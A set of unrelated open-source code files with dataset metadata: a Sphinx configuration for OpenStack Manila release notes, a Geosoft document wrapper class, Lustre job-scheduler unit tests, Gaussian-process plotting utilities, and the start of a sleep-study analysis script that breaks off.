openstack/manila | releasenotes/source/conf.py | 1 | 8885 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Manila Release Notes documentation build configuration file, created by
# sphinx-quickstart on Tue Nov 3 17:40:50 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'reno.sphinxext',
'openstackdocstheme',
]
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/manila'
openstackdocs_bug_project = 'manila'
openstackdocs_bug_tag = 'release notes'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
copyright = u'2015, Manila Developers'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = [openstackdocstheme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ManilaReleaseNotesdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'ManilaReleaseNotes.tex', u'Manila Release Notes Documentation',
u'Manila Developers', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'manilareleasenotes', u'Manila Release Notes Documentation',
[u'Manila Developers'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ManilaReleaseNotes', u'Manila Release Notes Documentation',
u'Manila Developers', 'ManilaReleaseNotes',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| apache-2.0 | 3,138,875,757,549,318,700 | 32.152985 | 79 | 0.706697 | false |
GeosoftInc/gxpy | geosoft/gxapi/GXDOCU.py | 1 | 10991 | ### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXDOCU(gxapi_cy.WrapDOCU):
"""
GXDOCU class.
Class to work with documents
"""
def __init__(self, handle=0):
super(GXDOCU, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXDOCU <geosoft.gxapi.GXDOCU>`
:returns: A null `GXDOCU <geosoft.gxapi.GXDOCU>`
:rtype: GXDOCU
"""
return GXDOCU()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Miscellaneous
def copy(self, doc_us):
"""
Copy `GXDOCU <geosoft.gxapi.GXDOCU>`
:param doc_us: Source `GXDOCU <geosoft.gxapi.GXDOCU>`
:type doc_us: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._copy(doc_us)
@classmethod
def create(cls):
"""
Create a document onject
:returns: `GXDOCU <geosoft.gxapi.GXDOCU>` Object
:rtype: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapDOCU._create(GXContext._get_tls_geo())
return GXDOCU(ret_val)
@classmethod
def create_s(cls, bf):
"""
Create from a serialized source
:param bf: `GXBF <geosoft.gxapi.GXBF>` from which to read `GXDOCU <geosoft.gxapi.GXDOCU>`
:type bf: GXBF
:returns: `GXDOCU <geosoft.gxapi.GXDOCU>` Object
:rtype: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapDOCU._create_s(GXContext._get_tls_geo(), bf)
return GXDOCU(ret_val)
def get_file(self, file):
"""
Get the document and place in a file.
:param file: File to which to write document
:type file: str
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_file(file.encode())
def get_file_meta(self, file):
"""
Get the document and place in a file with metadata.
:param file: File to which to write document
:type file: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If this document is only a URL link, the URL link will
be resolved and the document downloaded from the appropriate
server using the protocol specified.
The document has metadata, and the native document does not
support metadata, the metadata will be placed in an associated
file "filename.extension.GeosoftMeta"
"""
self._get_file_meta(file.encode())
def get_meta(self, meta):
"""
Get the document's meta
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` object to fill in with the document's meta
:type meta: GXMETA
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_meta(meta)
def doc_name(self, name):
"""
The document name.
:param name: Buffer to fill with document name
:type name: str_ref
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
name.value = self._doc_name(name.value.encode())
def file_name(self, name):
"""
The original document file name.
:param name: Buffer to fill with document file name
:type name: str_ref
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
name.value = self._file_name(name.value.encode())
def have_meta(self):
"""
Checks if a document has metadata.
:rtype: bool
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = self._have_meta()
return ret_val
def is_reference(self):
"""
Is the document only a reference (a URL) ?
:returns: 1 - Yes, 0 - No
:rtype: int
.. versionadded:: 5.1.6
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = self._is_reference()
return ret_val
def open(self, mode):
"""
Open a document in the document viewer
:param mode: :ref:`DOCU_OPEN`
:type mode: int
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** On Windows, the default application for the file extension is
used to open the file.
"""
self._open(mode)
def serial(self, bf):
"""
Serialize `GXDOCU <geosoft.gxapi.GXDOCU>`
:param bf: `GXBF <geosoft.gxapi.GXBF>` in which to write object
:type bf: GXBF
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._serial(bf)
def set_file(self, type, name, file):
"""
Set the document from a file source.
:param type: Document type
:param name: Document name, if "" file name will be used
:param file: Document file, must exist
:type type: str
:type name: str
:type file: str
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Document types are normally identified by their extension. If you
leave the document type blank, the extension of the document file
will be used as the document type.
To resolve conflicting types, you can define your own unique type
by entering your own type "extension" string.
The following types are pre-defined (as are any normal Geosoft
file types):
"htm" HTML
"html" HTML
"txt" ASCII text file
"doc" Word for Windows document
"pdf" Adobe PDF
"map" Geosoft map file
"mmap" Mapinfo map file (real extension "map")
"grd" Geosoft grid file
"gdb" Geosoft database
URL Document Links
The document name can be a URL link to the document using one of
the supported protocols. The following protocols are supported:
http://www.mywebserver.com/MyFile.doc - `GXHTTP <geosoft.gxapi.GXHTTP>`
dap://my.dap.server.com/dcs?DatasetName?MyFile.doc - DAP (DAP Document Access)
ftp://my.ftp.server.com/Dir1/MyFile.doc - FTP protocol
The full file name will be stored but no data will be stored with
the `GXDOCU <geosoft.gxapi.GXDOCU>` class and the document can be retrieved using the sGetFile_DOCU
method.
"""
self._set_file(type.encode(), name.encode(), file.encode())
def set_file_meta(self, type, name, file):
"""
Set the document from a file source with metadata.
:param type: Document type extension
:param name: Document name, if NULL use file name
:param file: Document file or URL
:type type: str
:type name: str
:type file: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** See `set_file <geosoft.gxapi.GXDOCU.set_file>`.
This function is the same as sSetFile_DOCU, plus insures that a
`GXMETA <geosoft.gxapi.GXMETA>` exists that includes the "Data" class. If the file has
associated metadata, either supported natively in the file, or
through an associated file "filename.extension.GeosoftMeta",
that metadata will be loaded into the `GXDOCU <geosoft.gxapi.GXDOCU>` meta, and a Data
class will be constructed if one does not exist.
Also, the Document type Extension is very important in that it
specifies the document types that natively have metadata. The
ones currently supported are:
"map" Geosoft map file
"gdb" Geosoft database
"grd" Geosoft grid file
"""
self._set_file_meta(type.encode(), name.encode(), file.encode())
def set_meta(self, meta):
"""
Set the document's meta
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` to add to the document's meta
:type meta: GXMETA
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._set_meta(meta)
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer | bsd-2-clause | 653,045,108,704,022,000 | 27.257069 | 135 | 0.589937 | false |
intel-hpdd/intel-manager-for-lustre | tests/unit/services/job_scheduler/test_target.py | 1 | 10758 | from chroma_core.lib.cache import ObjectCache
from chroma_core.models import ManagedTargetMount
from chroma_core.models import Nid
from chroma_core.services.job_scheduler.job_scheduler_client import JobSchedulerClient
from chroma_core.models import ManagedTarget, ManagedMgs, ManagedHost
from tests.unit.chroma_core.helpers import freshen
from tests.unit.chroma_core.helpers import MockAgentRpc
from tests.unit.services.job_scheduler.job_test_case import JobTestCaseWithHost
class TestMkfsOverrides(JobTestCaseWithHost):
def test_mdt_override(self):
import settings
self.create_simple_filesystem(self.host, start=False)
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
settings.LUSTRE_MKFS_OPTIONS_MDT = "-E block_size=1024"
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mdt.managedtarget_ptr, "formatted")
cmd, args = MockAgentRpc.skip_calls(["device_plugin", "export_target"])
self.assertEqual(cmd, "format_target")
self.assertDictContainsSubset({"mkfsoptions": settings.LUSTRE_MKFS_OPTIONS_MDT}, args)
def test_ost_override(self):
import settings
self.create_simple_filesystem(self.host, start=False)
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
settings.LUSTRE_MKFS_OPTIONS_OST = "-E block_size=2048"
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.ost.managedtarget_ptr, "formatted")
cmd, args = MockAgentRpc.skip_calls(["device_plugin", "export_target"])
self.assertEqual(cmd, "format_target")
self.assertDictContainsSubset({"mkfsoptions": settings.LUSTRE_MKFS_OPTIONS_OST}, args)
class TestTargetTransitions(JobTestCaseWithHost):
def setUp(self):
super(TestTargetTransitions, self).setUp()
self.mgt, mgt_tms = ManagedMgs.create_for_volume(self._test_lun(self.host).id, name="MGS")
ObjectCache.add(ManagedTarget, self.mgt.managedtarget_ptr)
for tm in mgt_tms:
ObjectCache.add(ManagedTargetMount, tm)
self.assertEqual(ManagedMgs.objects.get(pk=self.mgt.pk).state, "unformatted")
def test_start_stop(self):
from chroma_core.models import ManagedMgs
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "unmounted")
self.assertEqual(ManagedMgs.objects.get(pk=self.mgt.pk).state, "unmounted")
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.assertEqual(ManagedMgs.objects.get(pk=self.mgt.pk).state, "mounted")
def test_removal(self):
from chroma_core.models import ManagedMgs
self.mgt.managedtarget_ptr = self.set_and_assert_state(freshen(self.mgt.managedtarget_ptr), "removed")
with self.assertRaises(ManagedMgs.DoesNotExist):
ManagedMgs.objects.get(pk=self.mgt.pk)
self.assertEqual(ManagedMgs._base_manager.get(pk=self.mgt.pk).state, "removed")
def test_removal_mount_dependency(self):
"""Test that when removing, if target mounts cannot be unconfigured,
the target is not removed"""
from chroma_core.models import ManagedMgs
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
try:
# Make it so that the mount unconfigure operations will fail
MockAgentRpc.succeed = False
# -> the TargetMount removal parts of this operation will fail, we
# want to make sure that this means that Target deletion part
# fails as well
self.set_and_assert_state(self.mgt.managedtarget_ptr, "removed", check=False)
ManagedMgs.objects.get(pk=self.mgt.pk)
self.assertNotEqual(ManagedMgs._base_manager.get(pk=self.mgt.pk).state, "removed")
finally:
MockAgentRpc.succeed = True
# Now let the op go through successfully
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "removed")
with self.assertRaises(ManagedMgs.DoesNotExist):
ManagedMgs.objects.get(pk=self.mgt.pk)
self.assertEqual(ManagedMgs._base_manager.get(pk=self.mgt.pk).state, "removed")
def test_lnet_dependency(self):
"""Test that if I try to stop LNet on a host where a target is running,
stopping the target calculated as a dependency of that"""
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.lnet_configuration = self.assertState(self.host.lnet_configuration, "lnet_up")
consequences = JobSchedulerClient.get_transition_consequences(self.host.lnet_configuration, "lnet_down")
self.assertEqual(len(consequences["dependency_jobs"]), 1)
self.assertEqual(consequences["dependency_jobs"][0]["class"], "StopTargetJob")
def test_reformat_idempotency(self):
"""
Test that if a volume format passes its initial check for existing filesystems,
then it will format successfully even if the initial format operation is stopped
and restarted. To do that it has to pass reformat=True the second time
"""
path = self.mgt.managedtargetmount_set.get().volume_node.path
try:
MockAgentRpc.fail_commands = [
(
"format_target",
{
"device": path,
"target_types": "mgs",
"backfstype": "ldiskfs",
"device_type": "linux",
"target_name": "MGS",
},
)
]
command = self.set_and_assert_state(self.mgt.managedtarget_ptr, "formatted", check=False)
self.assertEqual(freshen(command).complete, True)
self.assertEqual(freshen(command).errored, True)
finally:
MockAgentRpc.fail_commands = []
# Check that the initial format did not pass the reformat flag
self.assertEqual(
MockAgentRpc.skip_calls(["device_plugin"]),
(
"format_target",
{
"device": path,
"target_types": "mgs",
"backfstype": "ldiskfs",
"device_type": "linux",
"target_name": "MGS",
},
),
)
# This one should succeed
self.set_and_assert_state(self.mgt.managedtarget_ptr, "formatted", check=True)
# Check that it passed the reformat flag
self.assertEqual(
MockAgentRpc.skip_calls(["device_plugin", "export_target"]),
(
"format_target",
{
"device": path,
"target_types": "mgs",
"backfstype": "ldiskfs",
"device_type": "linux",
"target_name": "MGS",
"reformat": True,
},
),
)
class TestSharedTarget(JobTestCaseWithHost):
mock_servers = {
"pair1": {
"fqdn": "pair1.mycompany.com",
"nodename": "test01.pair1.mycompany.com",
"nids": [Nid.Nid("192.168.0.1", "tcp", 0)],
},
"pair2": {
"fqdn": "pair2.mycompany.com",
"nodename": "test02.pair2.mycompany.com",
"nids": [Nid.Nid("192.168.0.2", "tcp", 0)],
},
}
def setUp(self):
super(TestSharedTarget, self).setUp()
self.mgt, tms = ManagedMgs.create_for_volume(
self._test_lun(
ManagedHost.objects.get(address="pair1"), secondary_hosts=[ManagedHost.objects.get(address="pair2")]
).id,
name="MGS",
)
ObjectCache.add(ManagedTarget, self.mgt.managedtarget_ptr)
for tm in tms:
ObjectCache.add(ManagedTargetMount, tm)
self.assertEqual(ManagedMgs.objects.get(pk=self.mgt.pk).state, "unformatted")
def test_clean_setup(self):
# Start it normally the way the API would on creation
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.assertEqual(ManagedTarget.objects.get(pk=self.mgt.pk).state, "mounted")
self.assertEqual(
ManagedTarget.objects.get(pk=self.mgt.pk).active_mount,
ManagedTargetMount.objects.get(host=self.hosts[0], target=self.mgt),
)
def test_teardown_unformatted(self):
self.assertEqual(ManagedTarget.objects.get(pk=self.mgt.pk).state, "unformatted")
try:
# We should need no agent ops to remove something we never formatted
MockAgentRpc.succeed = False
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "removed")
finally:
MockAgentRpc.succeed = True
with self.assertRaises(ManagedTarget.DoesNotExist):
ManagedTarget.objects.get(pk=self.mgt.pk)
def test_teardown_remove_primary_host(self):
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.set_and_assert_state(self.mgt.primary_host, "removed")
# Removing the primary server removes the target
with self.assertRaises(ManagedTarget.DoesNotExist):
ManagedTarget.objects.get(pk=self.mgt.pk)
def test_teardown_remove_secondary_host(self):
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
self.set_and_assert_state(self.mgt.failover_hosts[0], "removed")
# Removing the secondary server removes the target
with self.assertRaises(ManagedTarget.DoesNotExist):
ManagedTarget.objects.get(pk=self.mgt.pk)
def test_teardown_friendly_user(self):
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "mounted")
# Friendly user stops the target
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "unmounted")
# Friendly user removes the target
self.mgt.managedtarget_ptr = self.set_and_assert_state(self.mgt.managedtarget_ptr, "removed")
with self.assertRaises(ManagedTarget.DoesNotExist):
ManagedTarget.objects.get(pk=self.mgt.pk)
# Friendly user removes the secondary host
self.hosts[1] = self.set_and_assert_state(self.hosts[1], "removed")
# Friendly user removes the primary host
self.hosts[0] = self.set_and_assert_state(self.hosts[0], "removed")
| mit | 2,544,299,062,029,315,000 | 42.731707 | 116 | 0.634783 | false |
nealegibson/GeePea | src/GPUtils.py | 1 | 6261 | """
Some non-core utility functions for GPs
"""
from __future__ import print_function
import numpy as np
import pylab
try:
import dill
dill_available = 'yes'
except ImportError: dill_available = 'no'
####################################################################################################
def load(filename):
"""
Simple function to load a GP from a file using dill
"""
if not dill_available:
# raise ImportError, "dill module not found. can't load gp"
raise ImportError("dill module not found. can't load gp")
else:
file = open(filename,'r')
gp = dill.load(file)
file.close()
return gp
def save(ob,filename):
"""
Simple function to save GP or group to file using dill
"""
if not dill_available:
print("dill module not available. can't save gp")
else:
file = open(filename,'w')
dill.dump(ob,file)
file.close()
def RandomVector(K,m=None):
"""
Get a random gaussian vector from the covariance matrix K.
"""
if m is None: #set mean function if not given
m = np.zeros(K[:,0].size)
return np.random.multivariate_normal(m,K)
def RandVectorFromConditionedGP(K_s,PrecMatrix,K_ss,r,m=None):
"""
Get a random gaussian vector from the covariance matrix K.
m - mean function
calculates conditional covariance K_ss
calculates conditional mean and adds to mean function
"""
#ensure all data are in matrix form
K_s = np.matrix(K_s)
K_ss = np.matrix(K_ss)
PrecMatrix = np.matrix(PrecMatrix)
r = np.matrix(np.array(r).flatten()).T # (n x 1) column vector
# (q x n) = (q x n) * (n x n) * (n x 1)
f_s = K_s * PrecMatrix * r
# (q x q) = (q x q) - (q x n) * (n x n) * (n x q)
K_ss_cond = K_ss - np.matrix(K_s) * PrecMatrix * np.matrix(K_s).T
if m is None: #set zero mean function if not given
m = np.zeros(f_s.size)
return RandomVector(K_ss_cond,m=np.array(f_s).flatten()+m)
def PlotRange(ax,x,y,y_err,sigma=1.0,facecolor='0.5',alpha=0.6):
"""
Plot a range 'area' for GP regression given x,y values, y_error and no. sigma
"""
y1,y2 = y+sigma*y_err, y-sigma*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=facecolor,alpha=alpha)
def PlotSigmas(x,y,y_err,nsig=3,color='r',alpha=0.5):
"""
Plot 1 and 2 sigma range areas for GP regression given x,y values, y_error
"""
if type(color) is str: #create list
color = [color,]*(nsig+1)
for i in np.arange(-nsig,nsig+1):
pylab.plot(x,y+y_err*i,'-',color=color[np.abs(i)],alpha=alpha,lw=0.5)
def PlotDensity(x,y,yerr,n=200,nsig=5.,cmap='gray_r',sm_x=None,supersamp=None,**kwargs):
#need to resample to a regular spacing
if supersamp is None: supersamp = 1
x_new = np.linspace(x.min(),x.max(),x.size*supersamp)
y = np.interp(x_new,x,y)
yerr = np.interp(x_new,x,yerr)
x = x_new
#set range of y
y_lower,y_upper = (y-nsig*yerr).min(),(y+nsig*yerr).max()
y_range = np.linspace(y_lower,y_upper,n)
#set image extent
x_spacing = x[1]-x[0]
y_spacing = y[1]-y[0]
extent = [x.min()-x_spacing/2.,x.max()+x_spacing/2., y_range[0]-y_spacing/2.,y_range[-1]+y_spacing/2.]
print(y_spacing)
XX,YY = np.meshgrid(x,y_range)
IM = np.exp(-((YY-y)**2 / yerr**2)/2.)
#smooth in x?
if sm_x:
IM = ndimage.gaussian_filter1d(IM, sigma=sm_x, axis=1)
#IM = ndimage.median_filter(IM, footprint=(1,3))
#mask the array below nsig sigma - this allows overlapping transits, and presumably
#lowers file size
MaskedIM = np.ma.masked_where(IM<np.exp(-0.5*nsig**2),IM)
pylab.imshow(MaskedIM, cmap=cmap, aspect='auto', origin='lower', extent=extent, \
vmin=np.exp(-0.5*nsig**2),vmax=1,interpolation='gaussian',alpha=1.0,**kwargs)
return IM
def PlotRanges(x,y,y_err,lc='k',ls='-',title=None,lw=1,lw2=-1,c2='0.8',c1='0.6',alpha=0.8,ax=None):
"""
Plot 1 and 2 sigma range areas for GP regression given x,y values, y_error
"""
if ax==None: ax = pylab.gca()
ax.plot(x, y, color=lc, linewidth=lw, linestyle=ls,alpha=alpha) #plot predictive function and ranges
if lw2 < 0: lw2 = lw/2.
y1,y2 = y+2*y_err, y-2*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=c2,lw=lw2,alpha=alpha)
ax.plot(x,y1,'-',x,y2,'-',color=lc,alpha=alpha,lw=lw2)
y1,y2 = y+1*y_err, y-1*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=c1,lw=lw2,alpha=alpha)
ax.plot(x,y1,'-',x,y2,'-',color=lc,alpha=alpha,lw=lw2)
#pylab.plot()
if title: pylab.title(title)
def PlotData(x,y,y_err,title=None,fmt='o',ms=4,mfc='0.9',mec='k',ecolor='k',alpha=0.8,capsize=2,ax=None,**kwargs):
"""
Plot the data
"""
if ax==None: ax = pylab.gca()
#ax.errorbar(x,y,yerr=y_err,fmt='ko',fc='r',**kwargs)
ax.errorbar(x,y,yerr=y_err,fmt=fmt,ms=ms,mfc=mfc,mec=mec,ecolor=ecolor,\
alpha=alpha,capsize=capsize,**kwargs)
if title: pylab.title(title)
pylab.plot()
def PlotRange3D(ax,x1_pred,x2_pred,f_pred,f_pred_err,sigma=1.,facecolor=['r','g'],plot_range=True):
"""
Plot a range 'surface' for GP regression given X,f values, f_error and no. sigma
onto 3D axis 'ax'
"""
from matplotlib.mlab import griddata
#create X,Y mesh grid
xi, yi = np.arange(x1_pred.min(),x1_pred.max(),0.1), np.arange(x2_pred.min(),x2_pred.max(),0.1)
X, Y = np.meshgrid(xi, yi)
#use grid data to place (x1_pred, x2_pred, f_pred) values onto Z grid
Z = griddata(x1_pred, x2_pred, f_pred, xi, yi) #grid the predicted data
Z_u = griddata(x1_pred, x2_pred, f_pred+f_pred_err*sigma, xi, yi) #and error data...
Z_d = griddata(x1_pred, x2_pred, f_pred-f_pred_err*sigma, xi, yi)
#plot the surfaces on the axis (must be passed a 3D axis)
ax.plot_wireframe(X,Y,Z,color=facecolor[0],rstride=1,cstride=1)
if plot_range:
ax.plot_wireframe(X,Y,Z_u,color=facecolor[1],rstride=2,cstride=2)
ax.plot_wireframe(X,Y,Z_d,color=facecolor[1],rstride=2,cstride=2)
####################################################################################################
def add_n_par(N):
"""
Simple decorator function to add n_par to a static function - required for built in mean function
"""
def decor(func):
func.n_par = N
return func
return decor
###############################################################################################################
| gpl-3.0 | -4,645,364,629,243,388,000 | 30.305 | 114 | 0.612362 | false |
KHP-Informatics/sleepsight-analytics | generate_thesis_outputs.py | 1 | 5023 |
import numpy as np
from tools import Logger, Participant
import thesis as T
path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/data/'
plot_path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/plots/'
log_path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/logs/'
options = {'periodicity': False,
'participant-info': False,
'compliance': False,
'stationarity': False,
'symptom-score-discretisation': False,
'feature-delay': False,
'feature-selection': False,
'non-parametric-svm': False,
'non-parametric-gp': True
}
log = Logger(log_path, 'thesis_outputs.log', printLog=True)
# Load Participants
log.emit('Loading participants...', newRun=True)
aggr = T.Aggregates('.pkl', path, plot_path)
# Export Periodicity tables
if options['periodicity']:
